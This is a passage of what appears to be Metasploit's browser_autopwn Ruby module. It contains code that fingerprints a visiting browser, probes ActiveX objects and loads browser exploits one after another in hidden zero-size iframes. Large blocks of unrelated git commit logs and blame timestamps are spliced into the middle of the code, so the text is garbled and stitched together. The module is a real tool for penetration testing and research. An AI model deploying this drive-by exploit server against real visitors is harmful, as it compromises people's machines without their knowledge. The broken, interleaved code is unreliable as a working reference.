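    # Scripting disabled: only the (trivially faked) User-Agent is left
    # to go on. Most exploits need JavaScript anyway, so little is lost.
    print_status("Browser has javascript disabled, trying exploits that don't need it")
    record_detection(cli, request)
    if (action.name == "DefangedDetection")
      response = create_response()
      response.body = "Please wait"
    else
      response = build_noscript_response(cli, request)
    end
    response["Expires"] = "0"
    response["Cache-Control"] = "must-revalidate"
    cli.send_response(response)

  else
    print_status("404ing #{request.uri}")
    send_not_found(cli)
    return false
  end
end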
# Render the markup that loads one exploit: optional prefix HTML, the
# iframe pointing at the exploit's resource, then optional postfix HTML,
# each terminated by a newline. For IE clients the whole fragment is
# wrapped in an IE conditional comment so other browsers ignore it.
#
# @param autopwn_info [Hash] exploit description; reads :name, :ua_name,
#   :prefix_html and :postfix_html
# @param client_info currently unused, kept for call-site compatibility
# @return [String] the HTML fragment
def html_for_exploit(autopwn_info, client_info)
  iframe = build_iframe(exploit_resource(autopwn_info[:name]))
  fragments = [
    autopwn_info[:prefix_html] || "",
    iframe,
    autopwn_info[:postfix_html] || "",
  ]
  markup = fragments.map { |fragment| "#{fragment}\n" }.join

  # Only IE honours conditional comments; everything else sees an
  # ordinary HTML comment and skips the fragment.
  return markup unless autopwn_info[:ua_name] == HttpClients::IE

  "<!--[if IE]>\n#{markup}\n<![endif]-->\n"
end
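# Build the HTML for every non-javascript exploit that applies to the
# requesting client, based on user-agent detection only.
#
# @param cli the connected client; its +peerhost+ is passed to get_client
# @param request the HTTP request; the User-Agent header drives detection
# @return [String] concatenated exploit markup, empty when nothing matches
def build_noscript_html(cli, request)
  client_info = get_client(:host => cli.peerhost, :ua_string => request['User-Agent'])
  body = ""
  sploit_cnt = 0
  @noscript_tests.each do |browser, sploits|
    next if sploits.empty?
    next unless client_matches_browser(client_info, browser)
    sploits.each do |sploit|
      body << html_for_exploit(sploit, client_info)
      # Count per exploit rather than per browser group so the status
      # line reports the number of exploits actually served.
      sploit_cnt += 1
    end
  end
  print_status("Responding with #{sploit_cnt} non-javascript exploits")
  body
end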
# Build the HTTP response served to clients without javascript: a minimal
# page that embeds the output of build_noscript_html. Caching is disabled
# via Expires/Cache-Control so a repeat visit gets a fresh page.
#
# @param cli the connected client, forwarded to build_noscript_html
# @param request the HTTP request, forwarded to build_noscript_html
# @return the response object created by create_response
def build_noscript_response(cli, request)
  response = create_response()
  response['Expires'] = '0'
  response['Cache-Control'] = 'must-revalidate'

  # Assign the opening markup, then append the remaining fragments to the
  # same body string in place.
  response.body = "<html > <head > <title > Loading </title> </head> "
  [
    "<body> ",
    "Please wait ",
    build_noscript_html(cli, request),
    "</body> </html> ",
  ].each { |fragment| response.body << fragment }

  response
end
#
# Build some javascript that attempts to determine which exploits to run
# for the victim's OS and browser.
#
# Returns a raw javascript string to be eval'd on the victim
#
def build_script_response(cli, request)
|
|
|
|
response = create_response()
|
|
|
|
response['Expires'] = '0'
|
|
|
|
response['Cache-Control'] = 'must-revalidate'
|
|
|
|
|
2012-04-05 07:33:07 +00:00
|
|
|
# Host info no longer comes from the database! This is strictly a value
|
|
|
|
# that came back from javascript OS detection because NAT basically
|
|
|
|
# makes it impossible to keep host/client mappings straight.
|
2010-03-04 07:37:58 +00:00
|
|
|
client_info = get_client(:host => cli.peerhost, :ua_string => request['User-Agent'])
|
2012-04-05 07:33:07 +00:00
|
|
|
host_info = client_info[:host]
|
2009-07-23 08:43:54 +00:00
|
|
|
#print_status("Client info: #{client_info.inspect}")
|
2009-07-22 20:14:35 +00:00
|
|
|
|
2011-06-03 00:36:26 +00:00
|
|
|
js = "var global_exploit_list = []\n";
|
2009-08-06 05:56:24 +00:00
|
|
|
# If we didn't get a client from the database, then the detection
|
|
|
|
# is borked or the db is not connected, so fallback to sending
|
|
|
|
# some IE-specific stuff with everything. Do the same if the
|
|
|
|
# exploit didn't specify a client. Otherwise, make sure this is
|
|
|
|
# IE before sending code for ActiveX checks.
|
2009-07-23 08:43:54 +00:00
|
|
|
if (client_info.nil? || [nil, HttpClients::IE].include?(client_info[:ua_name]))
|
2009-07-22 20:14:35 +00:00
|
|
|
# If we have a class name (e.g.: "DirectAnimation.PathControl"),
|
|
|
|
# use the simple and direct "new ActiveXObject()". If we
|
2009-08-06 05:56:24 +00:00
|
|
|
# have a classid instead, first try creating the object
|
2009-07-22 20:14:35 +00:00
|
|
|
# with createElement("object"). However, some things
|
|
|
|
# don't like being created this way (specifically winzip),
|
|
|
|
# so try writing out an object tag as well. One of these
|
|
|
|
# two methods should succeed if the object with the given
|
|
|
|
# classid can be created.
|
|
|
|
js << <<-ENDJS
|
2012-04-18 00:54:26 +00:00
|
|
|
window.testAXO = function(axo_name, method) {
|
2009-07-22 20:14:35 +00:00
|
|
|
if (axo_name.substring(0,1) == String.fromCharCode(123)) {
|
|
|
|
axobj = document.createElement("object");
|
|
|
|
axobj.setAttribute("classid", "clsid:" + axo_name);
|
|
|
|
axobj.setAttribute("id", axo_name);
|
|
|
|
axobj.setAttribute("style", "visibility: hidden");
|
|
|
|
axobj.setAttribute("width", "0px");
|
|
|
|
axobj.setAttribute("height", "0px");
|
|
|
|
document.body.appendChild(axobj);
|
|
|
|
if (typeof(axobj[method]) == 'undefined') {
|
|
|
|
var attributes = 'id="' + axo_name + '"';
|
|
|
|
attributes += ' classid="clsid:' + axo_name + '"';
|
|
|
|
attributes += ' style="visibility: hidden"';
|
|
|
|
attributes += ' width="0px" height="0px"';
|
|
|
|
document.body.innerHTML += "<object " + attributes + "></object>";
|
|
|
|
axobj = document.getElementById(axo_name);
|
2009-07-19 20:48:47 +00:00
|
|
|
}
|
2009-07-22 20:14:35 +00:00
|
|
|
} else {
|
|
|
|
try {
|
|
|
|
axobj = new ActiveXObject(axo_name);
|
|
|
|
} catch(e) {
|
2012-04-18 00:54:26 +00:00
|
|
|
// If we can't build it with an object tag and we can't build it
|
|
|
|
// with ActiveXObject, it can't be built.
|
|
|
|
return false;
|
2009-07-22 20:14:35 +00:00
|
|
|
};
|
|
|
|
}
|
|
|
|
#{js_debug('axo_name + "." + method + " = " + typeof axobj[method] + "<br/>"')}
|
|
|
|
if (typeof(axobj[method]) != 'undefined') {
|
|
|
|
return true;
|
2009-07-19 17:27:36 +00:00
|
|
|
}
|
2009-07-22 20:14:35 +00:00
|
|
|
return false;
|
2012-04-18 00:54:26 +00:00
|
|
|
};
|
2009-07-22 20:14:35 +00:00
|
|
|
ENDJS
|
|
|
|
# End of IE-specific test functions
|
|
|
|
end
|
2009-08-06 05:56:24 +00:00
|
|
|
# Generic stuff that is needed regardless of what browser was detected.
|
2009-07-22 20:14:35 +00:00
|
|
|
js << <<-ENDJS
|
|
|
|
var written_iframes = new Array();
|
2012-04-08 23:06:23 +00:00
|
|
|
window.write_iframe = function (myframe) {
|
2009-07-22 20:14:35 +00:00
|
|
|
var iframe_idx; var mybody;
|
|
|
|
for (iframe_idx in written_iframes) {
|
|
|
|
if (written_iframes[iframe_idx] == myframe) {
|
|
|
|
return;
|
|
|
|
}
|
2009-07-19 20:48:47 +00:00
|
|
|
}
|
2009-07-22 20:14:35 +00:00
|
|
|
written_iframes[written_iframes.length] = myframe;
|
|
|
|
str = '';
|
|
|
|
str += '<iframe src="' + myframe + '" style="visibility:hidden" height="0" width="0" border="0"></iframe>';
|
|
|
|
document.body.innerHTML += (str);
|
};
|
|
|
|
window.next_exploit = function(exploit_idx) {
|
2012-04-18 00:54:26 +00:00
|
|
|
#{js_debug("'next_exploit(' + exploit_idx +')<br>'")}
|
2009-12-16 00:13:57 +00:00
|
|
|
if (!global_exploit_list[exploit_idx]) {
|
2012-04-18 00:54:26 +00:00
|
|
|
#{js_debug("'End<br>'")}
|
2009-12-16 00:13:57 +00:00
|
|
|
return;
|
|
|
|
}
|
Author: ohdae <bindshell@live.com>
Date: Sat Mar 17 13:28:31 2012 -0400
Added fix for enum_protections
commit 64611819d43bf13ab2d68f4353513c39e5a64fe0
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 03:14:26 2012 -0500
A bunch of fixes
commit bb1a0205d73e75a61a8fbf5ff6440dd09f9780f9
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:28:05 2012 -0500
The comments in get_chatlogs need an update
commit 666477e42a734f3120dcc4282b01b5ab5819384a
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:25:41 2012 -0500
Correct license format
commit 3c8eecbcd7b952abaca0b1ce14dca41e1d4cabb7
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:22:03 2012 -0500
Add enum_adium.rb post module
commit d290cf4fef1309df9a1af748e7c6c259a6788576
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 16:54:36 2012 -0300
Changed store_note to store_loot. Fixed local/remote file retrieval
commit ccb830b594ea0f0a8ce7c29b24f2f137ecfd5c4c
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 11:29:07 2012 -0600
Fall back to MIB method if we can't get netmasks
Misses IPv6 addresses, but at least doesn't break everything.
[Fixes #6525]
commit a9a30232dd5fcc0854c10b4d58df8511a23f3091
Author: sinn3r <msfsinn3r@gmail.com>
Date: Fri Mar 16 11:49:31 2012 -0500
This module is not ready, yanked.
commit 6bb34f7fd0785d31902f1edc938a6b05b91a1495
Author: Gregory Man <man.gregory@gmail.com>
Date: Fri Mar 16 18:09:08 2012 +0200
sockso_traversal 1.8 compatibility fix
commit e76965ce565a8ae634dc0d3c743542f1a6d977d7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:17:35 2012 -0400
fix
commit 61ce7b587de54363f7071bc19df5a29eb29e9aa7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:14:48 2012 -0400
saves each config to loot instead of notes
commit f4713974fa82d8b13017cb0817b5fd36696194d9
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 03:46:10 2012 -0600
Check for a 0 prefix length
If the OnLinkPrefixLength is 0, something is wrong, try the value in the
prefix linked list. Appears to fix v4 addresses on XP but not 2k3.
[See #6525]
commit cde7fcc012e04880f2faa28226a1fc5834a2e3d5
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 01:46:41 2012 -0600
Return network prefixes when available
Solves #6525 on Vista+. Win2k still works using the old MIB method
(which doesn't support ipv6). Win2k3 and XP are still busted for
unknown reasons.
commit 98bd9a7bd09149f524ebbe1501ec916bf99b078d
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 22:59:42 2012 -0400
Enumerate important and interesting configuration files
commit 9336df2ac28ee2df10a0e66e7006df3d23493492
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 19:06:48 2012 -0500
More Virtualisation SSL fixes
commit f24c378281ee6c85f687d4823f09ef5848812daf
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 18:15:29 2012 -0500
Default SSL to true for esx_fingerprint module
commit d6e14c42120df0fd16b79709ac5723d0e2818810
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:56:24 2012 -0500
Fix typo
commit b24dcfe43e625740ec8a1465f33be02f7ec40162
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:55:54 2012 -0500
Add sockso dir traversal
commit 033052c1e075fcf43e9c17e5ee4a5006247cb375
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 15 14:31:25 2012 -0600
Fix syntax error in 1.8, thanks Jun Koi for the patch
commit 4529efaeaa22e52c9c7c1528c68efb60af8af729
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:27:40 2012 -0500
enum_protections is now find_apps
commit 49e823802bd8f2cb1940545e74db04f3788352d1
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:22:23 2012 -0500
File rename, as well as design and cosmetic changes
commit ccf6b011145cf9db444f7e2d3fb3ec61738e88cb
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 15:29:52 2012 -0300
added report_note, removed store_loot function, cleaned up info/author
commit 27d571932e51afbac0c0fcd95c52f038786a9a28
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 12:18:29 2012 -0300
fixed output newline issue
commit 5a828e35d1629dc68825fe7d9322d1316888f8d7
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:05:35 2012 -0300
fixed save line
commit 805c2ee9871c076a8c0ac62b028a7942af70b6a5
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:02:07 2012 -0300
removed unneeded comments
commit 5861e1512f2949c0d7848d9ebed8241277462085
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:00:55 2012 -0300
fixed output issue
commit 593a3648111f1db1f56a410250539261c2a7cd9f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 18:26:53 2012 -0300
removed unneeded dependency
commit 05053e6e74b0ac99bbd4005c40ecc3b1196fd13f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 13:30:16 2012 -0400
locates installed 3rd-party av, fws, etc
commit 5bf512d0e9d2b412c4107228db178a7078111443
Author: sinn3r <msfsinn3r@gmail.com>
Date: Wed Mar 14 16:50:54 2012 -0500
Add OSVDB-79863 NetDecision Directory Traversal
commit 18715d0367f4ef01b5998d732043cbe224e1787e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 23:03:01 2012 -0600
Store the retrieved commands on the session
commit b752cb8b31fd8dcd221fb6caa483f6202bf5a4fd
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:45:16 2012 -0600
Retrieve the list of new commands
The client side doesn't do anything with them yet
commit 69ce8ef42d4089a0b26644bd4d6bebf57c4cfd50
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:41:16 2012 -0600
Return a list of the new commands in response to core_loadlib
Linux
commit 354c754aa4cce63ffebb4567f3bbfd621ffef46c
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 15:13:45 2012 -0600
Whitespace at EOL
commit 4afcb4cb9da1921ede29b03b149433cc65d680da
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 14:30:09 2012 -0600
Create instance methods that return extensions
Before this change, meterpreter sessions would not #respond_to? their
extensions despite having a pseudo-accessor for them:
```
>> client.respond_to? :sys
=> false
>> client.sys
=> #<Rex::Post::Meterpreter::ObjectAliases:0x0000000e263488 @aliases={"config"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config:0x0000000e268dc8 @client=#<Session:meterpreter 192.168.99.1:55882 (192.168.99.1) "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ wpad">>, "process"=>#<Class:0x0000000e268d20>, "registry"=>#<Class:0x0000000e266da0>, "eventlog"=>#<Class:0x0000000e2654e8>, "power"=>#<Class:0x0000000e263c30>}>
```
After:
```
>> client.respond_to? :sys
=> true
```
commit 70ab8c018f67d15929b6f41322540837ab7b37c5
Merge: a8a3938 5f2bace
Author: James Lee <egypt@metasploit.com>
Date: Tue Apr 3 11:46:25 2012 -0600
Merge branch 'master' into bap-refactor
Conflicts:
external/source/exploits/CVE-2012-0507/Help.java
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/msf/x/Help.java
external/source/exploits/CVE-2012-0507/src/a/Exploit.java
external/source/exploits/CVE-2012-0507/src/a/Help.java
commit a8a393891588a8b5c18e3c2173f1cd9c2480b2d0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 5e5eb39d3ccb62a9fc006be8241cfb97723caa06
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 5074eadbea426fc4f83d6d165a01e640ef42b4de
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit bdb3fbe7fd19aa76b4069edca5a78c53fec668c0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 78824ef60084510d3befe0ded6eed314d55eeb12
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:24:33 2012 -0600
Add the detected browser version to the DOM
Doing it this way lets modules grab the info a bit more easily.
commit 9813ccb8d6b14e0e728b8a13bacf59dd31b9c4b9
Merge: 0faa3f6 b5fc8e4
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:19:05 2012 -0600
Merge branch 'master' into bap-refactor
commit 0faa3f65240c3a2b3ab0e72f4aeb2e9f50ed54ee
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit 66ca27f994e3b11c9c8adae85642820768158860
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 7fc2ca1a0690c7a973307772aed42ab3514e1761
Merge: 325d306 e48c47e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:10:54 2012 -0600
Merge branch 'master' into bap-refactor
commit 325d3060599bc79674e93dd5f55a4e60061e9bdb
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 4f2b3260bf7f14f4d763625792adb0c3cfd1ed7c
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 9b905c53b4d46beb86da8168a1c2c5b2da340f6d
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
#{js_debug("'trying ' + global_exploit_list[exploit_idx].resource + ' of ' + global_exploit_list.length + '<br>'")}
// Wrap all of the vuln tests in a try-catch block so a
// single borked test doesn't prevent other exploits
// from working.
try {
var test = global_exploit_list[exploit_idx].test;
// Debugging
//tn = document.createTextNode("Test " + exploit_idx +"\\n");
//br = document.createElement("br");
//document.body.appendChild(tn);
//document.body.appendChild(br);
//tn = document.createTextNode(test);
//document.body.appendChild(tn);
if (!test) {
test = "true";
}
if (eval(test)) {
#{js_debug("'test says it is vuln, writing iframe for ' + global_exploit_list[exploit_idx].resource + '<br>'")}
window.write_iframe(global_exploit_list[exploit_idx].resource);
setTimeout("window.next_exploit(" + (exploit_idx+1).toString() + ")", 1000);
} else {
#{js_debug("'this client does not appear to be vulnerable to ' + global_exploit_list[exploit_idx].resource + '<br>'")}
window.next_exploit(exploit_idx+1);
}
} catch(e) {
#{js_debug("'test threw an exception: ' + e.message + '<br />'")}
window.next_exploit(exploit_idx+1);
};
Squashed commit of the following:
commit 6a3ad1d887df9d277e4878de94f8700ed8e404f9
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:49 2012 -0600
Add register_command calls for md5 and sha1
commit dbd52c5a1edfe1818a580d4d46aac0a9ca038e9c
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:09 2012 -0600
Read the file instead of downloading it
commit 55b84ad8e2a8532b3f8520ccb1162169b8e9c056
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 15:27:11 2012 -0600
Re-compile linux meterp to support the loadlib api
commit d112e84e490aa30aa9533fb0bdb33a9713ce01a5
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:50:25 2012 -0600
Re-compile java meterp to support the loadlib api
commit c137187b346b708487245a849b95343223e4e7b0
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:44:10 2012 -0600
Don't try to get interfaces if this session doesn't implement it
commit 88bba1e6c360c5725c4174623f56bcb6d8b54228
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:38:17 2012 -0600
Remove debugging load
commit 02954cbf93e2a13da967780cb703103b3f83ecf4
Merge: d9ef256 88b35a3
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 12:06:53 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.php
modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
commit d9ef2569b88ae8bce67f13316f6eff76311fd846
Author: James Lee <egypt@metasploit.com>
Date: Wed May 2 18:06:06 2012 -0600
PHP doesn't support rev2self
commit bf13ea0ff25541da07b8c099218e5ad7ea6ae8ba
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 18:21:59 2012 -0600
Add php support for returning new extension commands
commit 7e35f2d671d3797fc3fab12e54015387f44b0b33
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 16:03:26 2012 -0600
Reset CVE-2012-0507 back to master
Purges commits unrelated to this branch.
commit 86a77b3cd017e1e3a3f23d9fba3b9ed173761f80
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:59:35 2012 -0600
Revert "Make building the jar for cve-2012-0507 a bit easier"
This reverts commit 27ef76522ad10436ec785728445ed2cc0657f85f.
Conflicts:
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/src/msf/x/PayloadX.java
commit 8c259fb779f736be16fe972215ddff1dd32fd0f3
Merge: fe2c273 1c03c2b
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:35:44 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.jar
data/meterpreter/meterpreter.jar
external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
modules/auxiliary/server/browser_autopwn.rb
commit fe2c273a6d840c67040d6c9e337f908204337e18
Merge: 8caff47 4e955e5
Author: James Lee <egypt@metasploit.com>
Date: Fri Apr 6 10:19:53 2012 -0600
Merge branch 'rapid7' into feature/4905
commit 8caff47d97469f1a5459c04461fd1098487ea514
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:51:18 2012 -0600
Fix requires to find the test library
commit 51c33574cee3c47f0b2900c388d3d1213dd0a90d
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:48:35 2012 -0600
Fix a load order problem with solaris post mods
commit 81b658362e5e6bdd215d18b53d14429d163aff72
Merge: adad2cf 6ef4257
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:43:19 2012 -0600
Merge branch 'master' into feature/4905
commit 6ef42579471c6fde4bba71d0d4ce2c6c3e836180
Merge: 70ab8c0 5852455
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:16:56 2012 -0600
Merge branch 'rapid7'
Conflicts:
lib/rex/exploitation/javascriptosdetect.rb
commit adad2cf04c501c2a787e5475b62abd31871c06a0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 4f8a437b490e2b2774f9efd23b4891eaf007cf16
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 27ef76522ad10436ec785728445ed2cc0657f85f
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit db3dbad0a5ff20b05758be073c3502138ff095c2
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 776976af31795bdf1b405e208a2d4b78a6b6c2cf
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit a611ab16e06bd324d6616d0bd69f2c09d671bca0
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 5114d35de7c2f234ac7fe4288b344d4f2bb9731f
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 748309465a029593e2fe2fd445149745367513f4
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 954d485e3b8ffea9a7451bd495c1956a098e0eda
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
commit cba8d7c911fb184f6358948022fd4a0e010878d0
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 18:04:50 2012 -0600
Linux doesn't implement (drop|steal)_token
commit 1cfda3a7b045c08ecfae1ad688e0124e76bd0c8f
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 17:57:37 2012 -0600
Add availability checks for net, sys, ui, and webcam
commit 4bdf39a8bf4b5aab293fc47cb8282d0346db0811
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 16:45:59 2012 -0600
add requirement checking for fs and core commands
commit 42e35971c9f7348b57293b2b94a42dd0260ac7e4
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:59 2012 -0600
Add a to_octal method that converts e.g. "A" to \0101
commit c3b9415a0a9e2b55b1effbaf2396e11f88301aaa
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:07 2012 -0600
Don't use "echo -n"
It's not portable
commit b0f3ceccfaedbeaf67fbbe76f1a0a9aec7b44548
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 17:01:10 2012 -0600
Return a list of new commands after core_loadlib, java version
Thanks mihi for the patch and the awesome responsiveness!
commit d65303e1b6458bd4b95138dc0d61e5354c4e8d3a
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 13:21:06 2012 -0600
Make sure we have a response before doing stuff with it
commit 721001ead474a17d1a16de543f78b548879f5e7e
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 21:25:31 2012 -0600
Add missing rmdir and mkdir protocol commands to PHP
Now passes all the stdapi tests that it can
[*] Session type is meterpreter and platform is php/php
[+] should return a user id
[+] should return a sysinfo Hash
[-] FAILED: should return network interfaces
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should have an interface that matches session_host
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should return network routes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: 1
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[-] Passed: 10; Failed: 3
commit 024e99167a025f4678a707e1ee809a1524007d4d
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:26:00 2012 -0600
Use a proper TLV type instead of a generic one
commit 1836d915cbe0bfd2f536a667e74d8d6a6ccee72a
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:24:25 2012 -0600
Fix a counting error that caused segfaults (Linux)
commit 1e419d3fc392e435ae0af703561ce10bd5a45eb0
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:06:02 2012 -0600
Return a list of new commands after core_loadlib
Gets Windows back in sync with Linux
commit 3d3959f720de68e2f36ebfabe8196e01f98fe904
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 14:50:55 2012 -0600
Refactor extensionList -> extension_commands
It's not the same as extension_list.
commit a7acb638af803732fc5f3975e0c0632f427e0deb
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sun Mar 18 00:07:27 2012 -0500
Massive whitespace cleanup
commit ef8b9fd5cea7db43860a5b88d7397ba84393ecd5
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 16:00:20 2012 -0500
Add back enum_protections with some new changes
commit d778eec36953bb9bf4985e967ad2c119a1acd79b
Author: ohdae <bindshell@live.com>
Date: Sat Mar 17 13:28:31 2012 -0400
Added fix for enum_protections
commit 64611819d43bf13ab2d68f4353513c39e5a64fe0
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 03:14:26 2012 -0500
A bunch of fixes
commit bb1a0205d73e75a61a8fbf5ff6440dd09f9780f9
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:28:05 2012 -0500
The comments in get_chatlogs need an update
commit 666477e42a734f3120dcc4282b01b5ab5819384a
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:25:41 2012 -0500
Correct license format
commit 3c8eecbcd7b952abaca0b1ce14dca41e1d4cabb7
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:22:03 2012 -0500
Add enum_adium.rb post module
commit d290cf4fef1309df9a1af748e7c6c259a6788576
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 16:54:36 2012 -0300
Changed store_note to store_loot. Fixed local/remote file retrieval
commit ccb830b594ea0f0a8ce7c29b24f2f137ecfd5c4c
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 11:29:07 2012 -0600
Fall back to MIB method if we can't get netmasks
Misses IPv6 addresses, but at least doesn't break everything.
[Fixes #6525]
commit a9a30232dd5fcc0854c10b4d58df8511a23f3091
Author: sinn3r <msfsinn3r@gmail.com>
Date: Fri Mar 16 11:49:31 2012 -0500
This module is not ready, yanked.
commit 6bb34f7fd0785d31902f1edc938a6b05b91a1495
Author: Gregory Man <man.gregory@gmail.com>
Date: Fri Mar 16 18:09:08 2012 +0200
sockso_traversal 1.8 compatibility fix
commit e76965ce565a8ae634dc0d3c743542f1a6d977d7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:17:35 2012 -0400
fix
commit 61ce7b587de54363f7071bc19df5a29eb29e9aa7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:14:48 2012 -0400
saves each config to loot instead of notes
